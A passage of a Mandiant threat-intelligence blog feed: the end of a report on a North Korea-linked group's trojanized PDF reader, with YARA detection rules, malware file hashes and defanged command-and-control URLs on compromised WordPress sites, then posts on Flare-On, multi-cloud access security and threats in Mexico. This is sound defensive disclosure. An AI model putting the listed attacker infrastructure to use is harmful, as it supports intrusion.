href="https://cloud.google.com/blog/topics/threat-intelligence/dprk-whatsapp-phishing/"><span style="text-decoration: underline; vertical-align: baseline;">similar activity</span></a><span style="vertical-align: baseline;"> in 2022 attributed to UNC4034, which later got merged into UNC2970.</span></p> <p><span style="vertical-align: baseline;">UNC2970 is a cyber espionage group tracked by Mandiant since 2021 suspected to have a North Korea nexus. This threat actor's activities overlap with those of </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/north-korea-cyber-structure-alignment-2023"><span style="text-decoration: underline; vertical-align: baseline;">TEMP.Hermit</span></a><span style="vertical-align: baseline;">, a threat actor conducting collections of strategic intelligence aligned with North Korean interests that has been active since at least 2013.</span></p> <p><span style="vertical-align: baseline;">Mandiant has observed UNC2970 targeting victims located in the United States, United Kingdom, The Netherlands, Cyprus, Sweden, Germany, Singapore, Hong Kong, and Australia.</span></p> <h2><span style="vertical-align: baseline;">Acknowledgements</span></h2> <p><span style="vertical-align: baseline;">Martin Co, Muhammad Umer Khan, Mike Stokkel </span></p> <h2><span style="vertical-align: baseline;">Detection Opportunities</span></h2> <p><span style="vertical-align: baseline;">A </span><a href="https://www.virustotal.com/gui/collection/4bb3539c6f1336cb8154696428fb708bd558de300b18529a947fbe02a62e2907/summary" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Threat Intelligence Collection</span></a><span style="vertical-align: baseline;"> featuring indicators of compromise (IOCs) related to the activity described in this post is now available for registered users.</span></p> <h2><span style="vertical-align: baseline;">YARA Rules</span></h2></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Launcher_BURNBOOK_1 { meta: author = "Mandiant" date_created = "2024-08-12" date_modified = "2024-08-12" md5 = "8c2302c2d43ebe5dda18b8d943436580" rev = 1 strings: $pk_magic = { 50 4B 03 04 } $cd_magic = { 50 4B 01 02 } $n1 = "libmupdf.dll" $n2 = ".pdf" $n3 = "PdfFilter.dll" $n4 = "PdfPreview.dll" $n5 = "SumatraPDF.exe" condition: uint32(0) == 0x04034b50 and for any i in (2 .. #pk_magic) : ( ($n1 in (@pk_magic[i] + 30 .. @pk_magic[i] + 30 + uint16(@pk_magic[i] + 26))) and ($n1 in (@cd_magic[i] + 46 .. @cd_magic[i] + 46 + uint16(@cd_magic[i] + 28))) ) and for any i in (2 .. #pk_magic) : ( ($n2 in (@pk_magic[i] + 30 .. @pk_magic[i] + 30 + uint16(@pk_magic[i] + 26))) and ($n2 in (@cd_magic[i] + 46 .. @cd_magic[i] + 46 + uint16(@cd_magic[i] + 28))) ) and for any i in (2 .. #pk_magic) : ( ($n3 in (@pk_magic[i] + 30 .. @pk_magic[i] + 30 + uint16(@pk_magic[i] + 26))) and ($n3 in (@cd_magic[i] + 46 .. @cd_magic[i] + 46 + uint16(@cd_magic[i] + 28))) ) and for any i in (2 .. #pk_magic) : ( ($n4 in (@pk_magic[i] + 30 .. @pk_magic[i] + 30 + uint16(@pk_magic[i] + 26))) and ($n4 in (@cd_magic[i] + 46 .. @cd_magic[i] + 46 + uint16(@cd_magic[i] + 28))) ) and for any i in (2 .. #pk_magic) : ( ($n5 in (@pk_magic[i] + 30 .. @pk_magic[i] + 30 + uint16(@pk_magic[i] + 26))) and ($n5 in (@cd_magic[i] + 46 .. @cd_magic[i] + 46 + uint16(@cd_magic[i] + 28))) ) }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Launcher_BURNBOOK_2 { meta: author = "Mandiant" date_created = "2024-08-12" date_modified = "2024-08-12" md5 = "57e8a7ef21e7586d008d4116d70062a6" rev = 1 strings: $parse_decoy_document = { FF 15 [4-32] 41 B8 08 00 00 00 [4-32] FF 15 [4] 85 C0 0F 8? [4-32] 48 83 ?? 08 48 3B ?? 0F 8? [4-32] 41 B8 20 00 00 00 [4-32] FF 15 [4] 85 C0 0F 8? [4-32] 41 B8 0C 00 00 00 [4-32] FF 15 [4] 85 C0 0F 8? } $chacha_marker = { 65 78 70 61 [0-12] 6E 64 20 33 [0-12] 32 2D 62 79 [0-12] 74 65 20 6B } condition: all of them }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Backdoor_MISTPEN_2 { meta: author = "Mandiant" date_created = "2024-08-13" date_modified = "2024-08-13" md5 = "eca8eb8871c7d8f0c6b9c3ce581416ed" rev = 1 strings: $s1 = "Cookie: _PHPSESSIONID=" $s2 = "%d_%s_%d" $s3 = "DEAD" fullword $s4_sleep_succcess = { 53 6C 65 65 [1-16] 70 20 53 75 [1-16] 63 63 65 73 [1-16] 73 00 } $s5_hiber_success = { 48 69 62 65 [1-16] 72 20 53 75 [1-16] 63 63 65 73 [1-16] 73 00 } $s6 = "Loaded at %p" $s7 = "setup.bin" wide $send_DEAD_signal = { 8B 05 [4] 48 C7 ?? FF FF FF FF 89 45 ?? 0F B6 05 [4] 88 45 ?? 4? 8D [2-64] B9 40 00 00 00 FF 15 [4-8] 8? ?? 01 [1-32] 48 8D 48 08 E8 } $const_marker = { 83 E3 09 81 C3 11 27 00 00 } condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and (6 of them or ($s1 and $s2 and $s3 and $s6)) }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Launcher_TEARPAGE_1 { meta: author = "Mandiant" date_created = "2024-08-13" date_modified = "2024-08-13" md5 = "006cbff5d248ab4a1d756bce989830b9" rev = 1 strings: $load_encrypted_payload = { FF 15 [4-8] 83 F8 2C 0F 8? [4-32] 41 B8 20 00 00 00 [4-12] FF 15 [4] 85 C0 0F 8? [4-32] 41 B8 0C 00 00 00 [4-12] FF 15 [4] 85 C0 0F 8? [4-32] 83 C6 D4 B9 40 00 00 00 [2-16] FF 15 } $chacha_marker = { 65 78 70 61 [0-12] 6E 64 20 33 [0-12] 32 2D 62 79 [0-12] 74 65 20 6B } $load_pe = { 81 3C [1-3] 50 45 00 00 [1-8] 8B [1-3] 50 [4-32] B9 FF FF 1F 00 [2-16] FF 15 [4-64] C7 44 24 [1-8] 40 00 00 00 C7 44 24 [1-8] 00 30 00 00 41 FF D? 85 C0 0F 8? } condition: all of them }</code></pre></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">YARA-L Rules</span></h2> <p><span style="vertical-align: baseline;">Mandiant has made the relevant rules available in the Google SecOps Mandiant Intel Emerging Threats curated detections rule set. The activity discussed in the blog post is detected under the rule names:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">BURNBOOK Related Files Dropping Activity</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">BURNBOOK C2 Callout Activity</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">BURNBOOK Payload Dropping Activity</span></p> </li> </ul> <h2><span style="vertical-align: baseline;">Indicators of Compromise</span></h2> <h3><span style="vertical-align: baseline;">Host-Based IOCs</span></h3></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/><col/></colgroup> <thead> <tr> <th scope="col" style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">IOC</strong></p> </th> <th scope="col" style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">MD5</strong></p> </th> <th scope="col" style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">Associated Malware Family</strong></p> </th> </tr> </thead> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">BAE_Vice President <br/>of Business Development.pdf</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p role="presentation" style="text-align: justify;"><code style="vertical-align: baseline;">28a75771ebdb96d9b49c9369918ca581</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Encrypted PDF containing MISTPEN payload</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: justify;"><code style="vertical-align: baseline;">libmupdf.dll</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p role="presentation" style="text-align: justify;"><code style="vertical-align: baseline;">57e8a7ef21e7586d008d4116d70062a6</code></p> <p role="presentation" style="text-align: justify;"><code style="vertical-align: baseline;">f3baee9c48a2f744a16af30220de5066</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">BURNBOOK</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">%APPDATA%\Roaming\Microsoft\BDE<br/> UI Launcher\wtsapi32.dll</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p role="presentation" style="text-align: justify;"><code style="vertical-align: baseline;">006cbff5d248ab4a1d756bce989830b9</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">TEARPAGE</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: justify;"><code style="vertical-align: baseline;">%APPDATA%\Roaming\Thumbs.ini </code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p role="presentation" style="text-align: justify;"><code style="vertical-align: baseline;">0b77dcee18660bdccaf67550d2e00b00</code></p> <p role="presentation" style="text-align: justify;"><code style="vertical-align: baseline;">b707f8e3be12694b4470255e2ee58c81</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">MISTPEN</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">binhex.dll</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p role="presentation" style="text-align: justify;"><code style="vertical-align: baseline;">cd6dbf51da042c34c6e7ff7b1641837d</code></p> <p role="presentation" style="text-align: justify;"><code style="vertical-align: baseline;">eca8eb8871c7d8f0c6b9c3ce581416ed</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">MISTPEN</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Network-Based IOCs</span></h3></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">URL</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: justify;"><code style="vertical-align: baseline;">hxxps://graph.microsoft[.]com/v1.0/me/drive/root:/path/upload/world/266A25710006EF92</code></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: justify;"><code style="vertical-align: baseline;">heropersonas[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: justify;"><code style="vertical-align: baseline;">hxxps://dstvdtt.co[.]za/wp-content/plugins/social-pug/assets/lib.php</code></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: justify;"><code style="vertical-align: baseline;">hxxps://cmasedu[.]com/wp-content/plugins/kirki/inc/script.php</code></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: justify;"><code style="vertical-align: baseline;">hxxps://bmtpakistan[.]com/solution/wp-content/plugins/one-click-demo-import/assets/asset.php</code></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: justify;"><code style="vertical-align: baseline;">hxxps://verisoftsystems[.]com/wp-content/plugins/optinmonster/views/upgrade-link-style.php</code></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: justify;"><code style="vertical-align: baseline;">hxxps://www.clinicabaru[.]co/wp-content/plugins/caldera-forms/ui/viewer-two/viewer-2.php</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div></description><pubDate>Tue, 17 Sep 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/unc2970-backdoor-trojanized-pdf-reader/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>An Offer You Can Refuse: UNC2970 Backdoor Deployment Using Trojanized PDF Reader</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/unc2970-backdoor-trojanized-pdf-reader/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>Announcing the 11th Annual Flare-On Challenge</title><link>https://cloud.google.com/blog/topics/threat-intelligence/announcing-eleventh-annual-flare-on-challenge/</link><description><div class="block-paragraph_advanced"><p>Written by: Nick Harbour</p> <hr/></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">When it's pumpkin spice season, that means it's also Flare-On Challenge season. The Flare-On Challenge is a reverse engineering contest held every year by the FLARE team, and this marks its eleventh year running. It draws thousands of players from around the world every year, and is the foremost single-player CTF-style challenge for current and aspiring reverse engineers. It provides individual players with a gauntlet of increasingly challenging puzzles to test their ability, and earn a position in our hall of fame. Veteran competitors who have been following the live countdown over at </span><a href="http://flare-on.com" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">flare-on.com</span></a><span style="vertical-align: baseline;"> may have already marked their calendar for the contest launch at 8:00pm ET on Sept. 27th, 2024. It will run for six weeks, ending at 8:00pm ET on Nov. 8th, 2024.</span></p> <p><span style="vertical-align: baseline;">The Flare-On contest always features a diverse array of architectures, but with a strong representation of Windows binaries. This year’s contest may be the most diverse ever, with 10 challenges covering architectures including Windows, Linux, JavaScript, .NET, YARA, UEFI, Verilog, and Web3. Yes, you read that correctly, there is a YARA challenge this year. The challenges are often designed to represent Reverse Engineering challenges the FLARE team has encountered on the frontlines of cybersecurity.</span></p> <p><span style="vertical-align: baseline;">If you successfully crush all 10 challenges you will be eligible to receive a prize, which will be revealed later. This crucial bit of gear will distinguish you from your colleagues who have not mastered the arcane art of Reverse Engineering, and will thus be an object of their envy. Your name or handle, should you choose to be included, will be permanently etched into the Hall of Fame on the </span><a href="http://flare-on.com" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Flare-On website</span></a><span style="vertical-align: baseline;">. </span></p> <p><span style="vertical-align: baseline;">Please check the </span><a href="http://flare-on.com" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Flare-On website</span></a><span style="vertical-align: baseline;"> for the live countdown and, upon launch, the link to the game server. Early account registration will open approximately two days before launch. While you’re there, check out last year’s challenges and official solutions to prepare yourself. For official news and information, we will be using the Twitter/X hashtag #flareon11.</span></p></div></description><pubDate>Fri, 13 Sep 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/announcing-eleventh-annual-flare-on-challenge/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Announcing the 11th Annual Flare-On Challenge</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/announcing-eleventh-annual-flare-on-challenge/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>Protecting Multi-Cloud Resources in the Era of Modern Cloud-Based Cyberattacks</title><link>https://cloud.google.com/blog/topics/threat-intelligence/protecting-multi-cloud-resources-modern-cyberattacks/</link><description><div class="block-paragraph_advanced"><p>Written by: Rupanjana<span style="vertical-align: baseline;"> Mukherjee, Jon Sabberton</span></p> <hr/></div> <div class="block-paragraph_with_image"><div class="article-module h-c-page"> <div class="h-c-grid uni-paragraph-wrap"> <div class="uni-paragraph h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6 h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"> <figure class="article-image--wrap-small " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/standardizing-privileged-access-architectu.max-1000x1000.jpg" alt="Standardizing Privileged Access Architecture for Multi-Cloud cover"> </a> </figure> <p data-block-key="1mvlv">In the era of multi-cloud adoption, where organizations leverage diverse cloud platforms to optimize their operations, a new wave of security challenges have emerged. The expansion of attack surfaces beyond traditional on-premises environments, coupled with complex permission structures and the prevalence of overly permissive accounts, has created fertile ground for sophisticated cyberattacks.</p> </div> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Our white paper, </span><a href="https://services.google.com/fh/files/misc/standardizing-privileged-access-architecture-for-multi-cloud.pdf" rel="noopener" target="_blank"><span style="font-style: italic; vertical-align: baseline;">Standardizing Privileged Access Architecture for Multi-Cloud</span></a><span style="vertical-align: baseline;">, explores the critical risks associated with multi-cloud environments, and provides a practical framework for establishing a robust security posture.</span></p> <p><span style="vertical-align: baseline;">This Mandiant paper delves into the intricacies of managing disparate cloud identities, roles, and access control models, highlighting the vulnerabilities that arise from misconfigurations and fragmented security practices. Additionally, this paper examines real-world attack scenarios observed by Mandiant, demonstrating how threat actors exploit these weaknesses to compromise sensitive data, disrupt operations, and gain unauthorized control.</span></p> <p><span style="vertical-align: baseline;">To counter these evolving threats, Mandiant introduces a cloud agnostic tiered security model revolving the following controls, to protect privileged access to critical assets in the cloud:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Resource tiering within cloud platforms </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Limiting lateral movement through credential tiering</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Enforcing strict access controls through a zero-trust approach </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Apply scalable security configurations and governance for all resources</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Consistent monitoring and analytics practices</span></p> </li> </ul> <p><span style="vertical-align: baseline;">This paper discusses an architecture for cloud agnostic tiering, and how it will help protect a hybrid multi-cloud environment from various modern cyberattacks. By implementing the proactive measures outlined in this paper, organizations can effectively mitigate risks associated with a hybrid multi-cloud environment, limit paths of lateral movement, and protect their critical assets in the dynamic multi-cloud landscape.</span></p> <p><span style="vertical-align: baseline;">For organizations exploring multi-cloud deployments and those attempting to secure their current cloud resources, this paper serves as a vital guidance to harden their environment against cloud-based attacks.</span></p> <p><span style="vertical-align: baseline;">Read the <a href="https://services.google.com/fh/files/misc/standardizing-privileged-access-architecture-for-multi-cloud.pdf" rel="noopener" target="_blank">paper</a> today. To hear more about the topics discussed in this paper, watch our “<a href="https://www.youtube.com/watch?v=tJIVznkfIJ0" rel="noopener" target="_blank">Standardizing a Privileged Access Model for a Multi-Cloud Environment</a>” session from </span><a href="https://mwise.mandiant.com/conf24/home" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">mWISE Conference 2024</span></a><span style="vertical-align: baseline;">.</span></p></div></description><pubDate>Thu, 12 Sep 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/protecting-multi-cloud-resources-modern-cyberattacks/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Protecting Multi-Cloud Resources in the Era of Modern Cloud-Based Cyberattacks</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/protecting-multi-cloud-resources-modern-cyberattacks/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>Insights on Cyber Threats Targeting Users and Enterprises in Mexico</title><link>https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-targeting-mexico/</link><description><div class="block-paragraph_advanced"><p>Written by: Aurora Blum, Kelli Vanderlee</p> <hr/></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Like many countries across the globe, Mexico faces a cyber threat landscape made up of a complex interplay of global and local threats, with threat actors carrying out attempted intrusions into critical sectors of Mexican society. Mexico also faces threats posed by the worldwide increase in multifaceted extortion, as ransomware and data theft continue to rise.</span></p> <p><span style="vertical-align: baseline;">Threat actors with an array of motivations continue to seek opportunities to exploit the digital infrastructure that Mexicans rely on across all aspects of society. This joint blog brings together our collective understanding of the cyber threat landscape impacting Mexico, combining insights from Google's Threat Analysis Group (TAG) and Mandiant's frontline intelligence. By sharing our global perspective, especially during today's</span><span style="vertical-align: baseline;"> </span><a href="https://blog.google/around-the-globe/google-latin-america/google-for-mexico-2024/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google for Mexico event</span></a><span style="vertical-align: baseline;">, we hope to enable greater resiliency in mitigating these threats.</span></p> <h2><span style="vertical-align: baseline;">Cyber Espionage Operations Targeting Mexico</span></h2> <p><span style="vertical-align: baseline;">As the 12th largest economy in the world, Mexico draws attention from cyber espionage actors from multiple nations, with targeting patterns mirroring broader priorities and focus areas that we see elsewhere. Since 2020, cyber espionage groups from more than 10 countries have targeted users in Mexico; however, more than 77% of government-backed phishing activity is concentrated among groups from the People's Republic of China (PRC), North Korea, and Russia.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/threats-targeting-mexico-fig1.max-1000x1000.jpg" alt="Government-backed phishing activity targeting Mexico"> </a> <figcaption class="article-image__caption "><p data-block-key="5ml7z">Figure 1: Government-backed phishing activity targeting Mexico, January 2020 – August 2024</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The examples here highlight recent and historical examples where cyber espionage actors have targeted users and organizations in Mexico. It should be noted that these campaigns describe targeting and do not indicate successful compromise or exploitation.</span></p> <h3><span style="vertical-align: baseline;">PRC Cyber Espionage Activity Targeting Mexico</span></h3> <p><span style="vertical-align: baseline;">Since 2020, we have observed activity from seven cyber espionage groups with links to the PRC targeting users in Mexico, accounting for a third of government-backed phishing activity in the country.</span></p> <p><span style="vertical-align: baseline;">This volume of PRC cyber espionage is similar to activity in other regions where Chinese government investment has been focused, such as countries within </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/apt40-examining-a-china-nexus-espionage-actor"><span style="text-decoration: underline; vertical-align: baseline;">China's Belt and Road Initiative</span></a><span style="vertical-align: baseline;">. In addition to activity targeting Gmail users, PRC-backed groups have targeted Mexican government agencies, higher education institutions, and news organizations. </span></p> <h3><span style="vertical-align: baseline;">North Korean Government-Backed Groups Targeting Mexico</span></h3> <p><span style="vertical-align: baseline;">Since 2020, North Korean cyber actors have accounted for approximately 18% of government-backed phishing activity targeting Mexico. Similar to their targeting interests in other regions, cryptocurrency and financial technology firms have been a particular focus.</span></p> <p><span style="vertical-align: baseline;">One of the emerging trends we are witnessing globally from North Korea is the insider threat posed by North Korean nationals </span><a href="https://www.ic3.gov/Media/Y2023/PSA231018" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">gaining employment surreptitiously</span></a><span style="vertical-align: baseline;"> at corporations to conduct work in various IT roles. We note the potential for this threat to present a future risk to Mexican enterprises given historical activity by North Korean threat actors in Mexico and the challenges associated with the expansive problem of North Korean actors attempting to gain employment in other countries. </span></p> <h3><span style="vertical-align: baseline;">Russian Cyber Espionage Activity Targeting Mexico</span></h3> <p><span style="vertical-align: baseline;">Russian cyber espionage groups have targeted users in Mexico regularly for several years; however, since the start of Russia's war in Ukraine, Russian activity targeting Mexico has scaled back considerably—likely an indication of Russia's efforts to focus resources on Ukrainian and North Atlantic Treaty Organization (NATO) targets in the context of the Russia-Ukraine war. Of the four Russia-backed groups observed targeting Mexico, over 95% of the related phishing activity comes from one group, APT28 (aka </span><a href="https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">FROZENLAKE</span></a><span style="vertical-align: baseline;">). </span></p> <p><span style="vertical-align: baseline;">Since 2020, Russian cyber actors have accounted for approximately one-fifth of government-backed phishing activity targeting Mexico. However, in 2023 and 2024, Russian cyber actors only account for less than 1% of government-backed phishing activity targeting Mexico.</span></p> <h3><span style="vertical-align: baseline;">Commercial Surveillance Vendors </span></h3> <p><span style="vertical-align: baseline;">Spyware is typically used to monitor and collect data from high-risk users like journalists, human rights defenders, dissidents, and opposition-party politicians. These capabilities have grown the demand for spyware technology, making way for a lucrative industry used to sell to governments and nefarious actors the ability to exploit vulnerabilities in consumer devices. Google offers </span><a href="https://blog.google/technology/safety-security/online-safety-resources/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">a range of tools</span></a><span style="vertical-align: baseline;"> to help protect high-risk users from online threats.</span></p> <p><span style="vertical-align: baseline;">Over the past several years, </span><a href="https://citizenlab.ca/2017/06/reckless-exploit-mexico-nso/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">open</span></a><span style="vertical-align: baseline;"> </span><a href="https://citizenlab.ca/2017/02/bittersweet-nso-mexico-spyware/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">sources</span></a><span style="vertical-align: baseline;"> have </span><a href="https://forbiddenstories.org/about-the-pegasus-project/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">reported</span></a><span style="vertical-align: baseline;"> multiple cases involving the use of spyware to target many sectors of Mexican civil society, including journalists, activists, government officials, and their families in Mexico. TAG has previously </span><a href="https://blog.google/threat-analysis-group/commercial-surveillance-vendors-google-tag-report/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">highlighted the negative outcomes of commercial spyware tools</span></a><span style="vertical-align: baseline;">, including the proliferation of sophisticated cyber threat capabilities to new operators and sponsors, the increasing rates of zero-day vulnerability discovery and exploitation, and harm to targets of these tools. Though the use of spyware typically only affects a small number of human targets at a time, its wider impact ripples across society by contributing to growing threats to free speech and the free press and the integrity of democratic processes worldwide. TAG continues to observe evidence of several commercial surveillance vendors operating in Mexico. As recently as April 2024, TAG observed spyware being used in Mexico with Mexican news-themed lures.</span></p> <h2><span style="vertical-align: baseline;">Insights on Cyber Crime Targeting Users and Enterprises in Mexico</span></h2> <p><span 